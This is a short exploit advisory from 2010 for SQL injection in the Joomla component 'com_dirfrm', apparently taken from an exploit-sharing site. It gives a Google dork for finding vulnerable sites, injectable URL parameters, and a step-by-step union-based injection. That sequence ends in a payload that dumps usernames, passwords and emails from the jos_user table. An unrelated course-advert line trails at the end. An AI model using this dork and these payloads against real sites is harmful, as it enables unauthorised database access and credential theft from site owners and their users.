# Exploit Title : Joomla Component "com_dirfrm" Sql Injection Vulnerability  

# Date : 18 - 8 - 2010  

# Author : Hieuneo (Vietnam)  

# Version : All Versions  

# Tested on : Win 7 Home  

   

###############################################  

Dork google: inurl:"com_dirfrm"  

###############################################  

Exploit:  

http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL  

Injection]&id=8&Itemid=32  

or  

http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL  

Injection]&Itemid=32  

###############################################  

[SQL Injection]:  

-> Step1:  

- order by n--- False  

- order by n+1-- True  

   

-> Step2:null  Union select 1,2,3,4,...,n+1--  

Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null  

union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32  

   

-> Step3: replace display number on website  

version(), user(), database  

#if version SQL >=5 : try exploit with table system:  

___table_name from information_scheama.tables where table_schema=database()--  

___column_name form information_schema.columns where table_name=Char(name table)  

#if version SQL <5: try exploit with blind SQL, blind table_name and column_name  

   

-> Step 4: collecting information  

   

null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--  

   

Done!

[课程]Linux pwn 探索篇！